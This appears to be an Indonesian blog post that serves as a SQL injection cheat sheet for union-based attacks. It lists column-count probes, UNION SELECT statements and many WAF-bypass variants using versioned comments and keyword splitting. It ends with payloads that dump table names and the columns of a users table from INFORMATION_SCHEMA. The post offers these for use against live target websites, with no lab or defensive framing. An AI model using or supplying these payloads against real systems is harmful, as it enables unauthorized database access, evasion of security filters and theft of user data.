Union Based Column count - Union statement | SQL Injection

Union Based Column count - Union statement | SQL Injection

Nelo.F4 - List Of Column count - Union Statement. sebelum memulai ini semua, perlu diingat semua isi list di dalam artikel ini saya ambil dari hackbar.xpi mod by pesantren cyber team. dan perlu diingat juga saya bukan ahli dalam SQL Injection, saya hanya share yang saya tahu dan saya paham. list column count dan union statement ini untuk menemukan nomor emas/togel yang ada di dalam sebuah website, mungkin anda butuh sedikit ke griliyaan untuk mencobanya karena tidak semua payload yang saya share ini bisa anda gunakan di satu target saja mungkin juga payload yang saya berikan ini tidak work di satu server atau lebih. jikalau nantinya anda menemukan terget yang tidak work dengan semua payload, anda bisa mencoba membypassnya dengan WAF yang saya berikan dibawah nanti.

The contents of all of these articles

Column count
Columnt count WAF
Union statement
Union statement WAF
WAF-SETS

Column count

Column count ORDER BY

+ORDER+BY+1

Column count GROUP BY

+GROUP+BY+1,2,3,4,5,6,7,8,9,10

Column count PROCEDURE ANALYSE

+PROCEDURE+ANALYSE()

Column count SELECT FROM

'+AND+(SELECT * FROM +PROCEDURE+ANALYSE())=(SELECT 1)--+

Example WAF Bypass

Column count WAF

+/*!50000ORDER*/+/*!50000BY*/+1

Column count WAF String

/*!+ORDER+BY+1*/
OR
+/*!ORDER*/+/*!BY*/+1

Column count WAF /*!50000*/

/*!50000+ORDER+BY+1*/
OR
+/*!50000ORDER*/+/*!50000BY*/+1

Column count WAF /*!12345*/

/*!12345+ORDER+BY+1*/
OR
+/*!12345ORDER*/+/*!12345BY*/+1

Column count WAF /*!13337*/

/*!13337+ORDER+BY+1*/
OR
+/*!13337ORDER*/+/*!13337BY*/+1

Column count WAF cutoffCUTOFFWAFwaff

+o+ORDER+BY+1rder+by+1
OR
+orORDERder+byBY+1

NOTE: Jangan terpengaruh dengan angka yang saya berikan diatas, semua tergantung server yang akan anda coba nantinya. jika error diangka 13 alhasil Union statement yang anda berikan akan sampai 12. Sekali lagi semua tergantung server website yang akan anda eksekusi nantinya.

Union statement

Union statement INT,INT(+)

+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10

Union statement INT,INT()

Union Select 1,2,3,4,5,6,7,8,9,10

Union statement NULL,NULL

+UNION+ALL+SELECT+null,null,null,null,null,null,null,null,null,null--+-

Union Statement (INT),(INT)

+UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10))

Example WAF Bypass

Union statement WAF /*!50000*/

+/*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10
OR
/*!50000+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10*/

Union statement WAF String

/*!+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10*/
OR
+/*!UNION*/+/*!ALL*/+/*!SELECT*/+1,2,3,4,5,6,7,8,9,10

Union statement WAF /*!12345*/

+/*!12345UNION*/+/*!12345ALL*/+/*!12345SELECT*/+1,2,3,4,5,6,7,8,9,10
OR
/*!12345+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10*/

Union statement WAF /*!13337*/

/*!13337+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10*/
OR
+/*!13337UNION*/+/*!13337ALL*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10

Union statement WAF cutoffCUTOFFWAFwaf

+u+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10nion+all+select+1,2,3,4,5,6,7,8,9,10
OR
+unUNIONion+alALLl+seSELECTlect+1,2,3,4,5,6,7,8,9,10
OR STRING TO USE!
stSTRING/*&a=*/TO/*&a=*/USEring/*&a=*/to/*&a=*/use

WAF-SETS

Get Tables GROUP_CONCAT

(/*!%53ELECT*/+/*!50000GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.TABLES*//**//*!%57HERE*//**//*!TABLE_SCHEMA*//**/LIKE/**/DATABASE())

Get Column GROUP_CONCAT

(/*!%53ELECT*/+/*!50000GROUP_CONCAT(column_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.COLUMNS*//**//*!%57HERE*//**//*!TABLE_NAME*//**/LIKE/**/0x7573657273)

Get Tables One Shot

(/*!%53ELECT*/(@x)FROM(/*!%53ELECT*/(@x:=0x00),(@NR:=0),(/*!%53ELECT*/(0)/*!%46ROM*/(/*!%49NFORMATION_%53CHEMA*/./*!%54ABLES*/)/*!%57HERE*/(/*!%54ABLE_%53CHEMA*//**/NOT/**/LIKE/**/0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=/*!CONCAT%0a(*/@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,/*!%74able_%6eame*/,0x3c62723e))))x)

Get Column One Shot

(/*!%53ELECT*/+/*!50000GROUP_CONCAT(column_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.COLUMNS*//**//*!%57HERE*//**//*!TABLE_NAME*//**/LIKE/**/0x7573657273)

Ilmu yang saya punya hanya sedemikian. bersiaplah dengan kesalahan yang ada dan jangan mudah menyerah! keep spirit